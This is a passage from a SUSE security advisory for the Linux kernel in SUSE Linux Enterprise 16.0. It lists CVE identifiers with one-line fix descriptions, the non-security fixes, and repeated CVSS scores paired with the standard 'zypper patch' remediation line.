"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
SUSE-SU-2026:20555-1
Vulnerability from csaf_suse - Published: 2026-02-27 11:51 - Updated: 2026-02-27 11:51Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).
- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).
- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).
- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).
- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).
- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).
- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).
- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).
- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).
- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).
- CVE-2025-71132: smc91x: fix broken irq-context in PREEMPT_RT (bsc#1256737).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" (bsc#1256760).
- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).
- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).
- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22986: gpiolib: fix race condition for gdev->srcu (bsc#1257276).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- Add bugnumber to an existing hv_netvsc change (bsc#1257473).
- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).
- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)
- arm64: Update config files. Disable DEVPORT (bsc#1256792)
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).
- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).
- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).
- drm/imagination: Wait for FW trace update command completion (git-fixes).
- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).
- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).
- net: mana: Support HW link state events (bsc#1253049).
- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).
- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).
- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- tsm-mr: Add TVM Measurement Register support (bsc#1257504).
- tsm-mr: Add tsm-mr sample code (bsc#1257504).
- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).
- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).
- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).
- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).
Patchnames: SUSE-SL-Micro-6.2-325
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
